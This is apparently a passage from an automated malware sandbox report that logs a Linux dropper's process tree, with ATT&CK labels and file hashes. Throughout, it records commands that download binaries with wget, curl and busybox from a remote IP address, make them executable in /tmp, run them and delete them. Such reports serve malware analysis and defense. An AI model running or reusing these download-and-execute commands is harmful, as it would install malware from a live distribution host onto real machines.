/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:936
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:942
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:948
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:954
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:962
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:966
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:972
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:978
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97